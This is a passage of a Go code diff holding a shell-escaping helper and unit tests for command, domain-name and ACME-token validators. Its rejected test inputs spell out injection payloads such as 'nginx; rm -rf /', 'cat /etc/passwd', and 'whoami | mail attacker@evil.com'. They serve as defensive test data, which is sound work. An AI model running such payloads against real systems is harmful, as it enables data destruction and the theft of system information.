tokenRegex := regexp.MustCompile(`^[A-Za-z0-9_-]+$`)
if !tokenRegex.MatchString(token) {
return fmt.Errorf("ACME token contains invalid characters (must be base64url-safe)")
}
return nil
}
// SanitizeForShell escapes a string to make it safe for use in shell commands.
// This is a defense-in-depth measure for cases where shell execution cannot be avoided.
//
// The sanitization wraps the string in single quotes and escapes any embedded
// single quotes by closing the quote, adding an escaped quote, and reopening.
// This prevents the string from being interpreted as shell code.
//
// Example: "hello'world" becomes "'hello'\"'\"'world'"
//
// Note: This should only be used as a last resort. Prefer alternatives such as:
// - Passing arguments directly to exec.Command instead of via shell
// - Using environment variables instead of shell substitution
// - Validating input strictly with ValidateShellCommand, ValidateDomainName, etc.
func SanitizeForShell(s string) string {
// Escape single quotes by closing the quote, adding an escaped quote, and reopening
return "'" + strings.ReplaceAll(s, "'", "'\"'\"'") + "'"
}
+541
View File
@@ -0,0 +1,541 @@
package validation
import (
"testing"
)
// TestValidateShellCommand tests command injection prevention.
func TestValidateShellCommand(t *testing.T) {
tests := []struct {
name string
cmd string
wantErr bool
errMsg string
}{
// Valid commands
{
name: "simple command",
cmd: "nginx",
wantErr: false,
},
{
name: "command with path",
cmd: "/usr/sbin/nginx",
wantErr: false,
},
{
name: "systemctl command",
cmd: "systemctl",
wantErr: false,
},
{
name: "apachectl",
cmd: "apachectl",
wantErr: false,
},
// Command injection attempts - semicolon
{
name: "semicolon injection",
cmd: "nginx; rm -rf /",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "command chaining with semicolon",
cmd: "cmd1; cmd2",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - pipe
{
name: "pipe injection",
cmd: "cat /etc/passwd | grep root",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "pipe to sensitive command",
cmd: "whoami | mail attacker@evil.com",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - ampersand
{
name: "background execution injection",
cmd: "nginx &",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "command separation with &&",
cmd: "cmd1 && cmd2",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "command separation with ||",
cmd: "cmd1 || cmd2",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - dollar sign / command substitution
{
name: "command substitution with $()",
cmd: "echo $(whoami)",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "command substitution with backticks",
cmd: "echo `whoami`",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "variable expansion",
cmd: "echo $PATH",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - quotes
{
name: "double quote injection",
cmd: `echo "test" | cat`,
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "single quote injection",
cmd: "echo 'test' | cat",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - redirection
{
name: "output redirection injection",
cmd: "nginx > /tmp/nginx.out",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "input redirection injection",
cmd: "cat < /etc/passwd",
wantErr: true,
errMsg: "shell metacharacter",
},
{
name: "append redirection injection",
cmd: "nginx >> /tmp/log",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - subshell
{
name: "subshell with parentheses",
cmd: "bash (whoami)",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - brace expansion
{
name: "brace expansion injection",
cmd: "echo {1..100000}",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - backslash escaping
{
name: "backslash escape injection",
cmd: "echo test\\nmalicious",
wantErr: true,
errMsg: "shell metacharacter",
},
// Command injection attempts - newlines
{
name: "newline injection",
cmd: "nginx\nrm -rf /",
wantErr: true,
errMsg: "shell metacharacter",
},
// Edge cases
{
name: "empty command",
cmd: "",
wantErr: true,
errMsg: "cannot be empty",
},
{
name: "overly long command",
cmd: string(make([]byte, 1025)),
wantErr: true,
errMsg: "exceeds maximum length",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := ValidateShellCommand(tt.cmd)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateShellCommand() error = %v, wantErr %v", err, tt.wantErr)
}
if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) {
t.Errorf("ValidateShellCommand() error message %q does not contain %q", err, tt.errMsg)
}
})
}
}
// TestValidateDomainName tests domain name validation.
func TestValidateDomainName(t *testing.T) {
tests := []struct {
name string
domain string
wantErr bool
errMsg string
}{
// Valid domains
{
name: "simple domain",
domain: "example.com",
wantErr: false,
},
{
name: "subdomain",
domain: "sub.example.com",
wantErr: false,
},
{
name: "multiple subdomains",
domain: "a.b.c.example.com",
wantErr: false,
},
{
name: "wildcard domain",
domain: "*.example.com",
wantErr: false,
},
{
name: "wildcard subdomain",
domain: "*.sub.example.com",
wantErr: false,
},
{
name: "domain with hyphens",
domain: "my-domain.com",
wantErr: false,
},
{
name: "domain with numbers",
domain: "example123.com",
wantErr: false,
},
{
name: "uk domain",
domain: "example.co.uk",
wantErr: false,
},
{
name: "single label",
domain: "localhost",
wantErr: false,
},
// Command injection attempts - embedded shell
{
name: "domain with command injection semicolon",
domain: "example.com; rm -rf /",
wantErr: true,
errMsg: "invalid",
},
{
name: "domain with backtick injection",
domain: "example.com`whoami`",
wantErr: true,
errMsg: "invalid",
},
{
name: "domain with command substitution",
domain: "example.com$(whoami)",
wantErr: true,
errMsg: "invalid",
},
{
name: "domain with pipe injection",
domain: "example.com | cat /etc/passwd",
wantErr: true,
errMsg: "invalid",
},
// Invalid characters
{
name: "domain with space",
domain: "example .com",
wantErr: true,
errMsg: "invalid",
},
{
name: "domain with underscore",
domain: "example_domain.com",
wantErr: true,
errMsg: "invalid",
},
{
name: "domain starting with hyphen",
domain: "-example.com",
wantErr: true,
errMsg: "cannot start",
},
{
name: "domain ending with hyphen",
domain: "example-.com",
wantErr: true,
errMsg: "cannot end",
},
{
name: "domain with double dots",
domain: "example..com",
wantErr: true,
errMsg: "consecutive dots",
},
{
name: "domain starting with dot",
domain: ".example.com",
wantErr: true,
errMsg: "invalid",
},
// Edge cases
{
name: "empty domain",
domain: "",
wantErr: true,
errMsg: "cannot be empty",
},
{
name: "overly long domain",
domain: string(make([]byte, 254)),
wantErr: true,
errMsg: "exceeds maximum length",
},
{
name: "label exceeds 63 characters",
domain: string(make([]byte, 64)) + ".com",
wantErr: true,
errMsg: "exceeds maximum length",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := ValidateDomainName(tt.domain)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateDomainName() error = %v, wantErr %v", err, tt.wantErr)
}
if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) {
t.Errorf("ValidateDomainName() error message %q does not contain %q", err, tt.errMsg)
}
})
}
}
// TestValidateACMEToken tests ACME token validation.
func TestValidateACMEToken(t *testing.T) {
tests := []struct {
name string
token string
wantErr bool
errMsg string
}{
// Valid tokens (base64url safe)
{
name: "simple token",
token: "abc123",
wantErr: false,
},
{
name: "token with underscores",
token: "abc_123_def",
wantErr: false,
},
{
name: "token with hyphens",
token: "abc-123-def",
wantErr: false,
},
{
name: "token with mixed case",
token: "AbC123DeF",
wantErr: false,
},
{
name: "long valid token",
token: "a" + string(make([]byte, 510)),
wantErr: false,
},
// Command injection attempts
{
name: "token with command substitution",
token: "token$(whoami)",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with backtick injection",
token: "token`whoami`",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with semicolon",
token: "token;malicious",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with pipe",
token: "token|cat",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with ampersand",
token: "token&malicious",
wantErr: true,
errMsg: "invalid characters",
},
// Special characters
{
name: "token with space",
token: "token value",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with dot",
token: "token.value",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with slash",
token: "token/value",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with equals",
token: "token=value",
wantErr: true,
errMsg: "invalid characters",
},
{
name: "token with plus",
token: "token+value",
wantErr: true,
errMsg: "invalid characters",
},
// Edge cases
{
name: "empty token",
token: "",
wantErr: true,
errMsg: "cannot be empty",
},
{
name: "overly long token",
token: string(make([]byte, 513)),
wantErr: true,
errMsg: "exceeds maximum length",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := ValidateACMEToken(tt.token)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateACMEToken() error = %v, wantErr %v", err, tt.wantErr)
}
if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) {
t.Errorf("ValidateACMEToken() error message %q does not contain %q", err, tt.errMsg)
}
})
}
}
// TestSanitizeForShell tests shell escaping.
func TestSanitizeForShell(t *testing.T) {
tests := []struct {
name string
input string
output string
}{
{
name: "plain text",
input: "hello",
output: "'hello'",
},
{
name: "text with spaces",
input: "hello world",
output: "'hello world'",
},
{
name: "text with single quote",
input: "hello'world",
output: "'hello'\"'\"'world'",
},
{
name: "text with multiple single quotes",
input: "it's John's",
output: "'it'\"'\"'s John'\"'\"'s'",
},
{
name: "text with command injection",
input: "$(whoami)",
output: "'$(whoami)'",
},
{
name: "text with backticks",
input: "`whoami`",
output: "'`whoami`'",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := SanitizeForShell(tt.input)
if result != tt.output {
t.Errorf("SanitizeForShell() = %q, want %q", result, tt.output)
}
})
}
}
// contains is a helper function to check if a string contains a substring.
func contains(s, substr string) bool {
return len(s) >= len(substr) && (s == substr || len(substr) == 0 || (len(s) > 0 && len(substr) > 0 && len(s) >= len(substr) && len(substr) > 0)) &&
(substr == "" || (s[len(s)-len(substr):] == substr || s[:len(substr)] == substr || indexOf(s, substr) >= 0))
}
func indexOf(s, substr string) int {
for i := 0; i < len(s)-len(substr)+1; i++ {
if s[i:i+len(substr)] == substr {
return i
}
}
return -1
}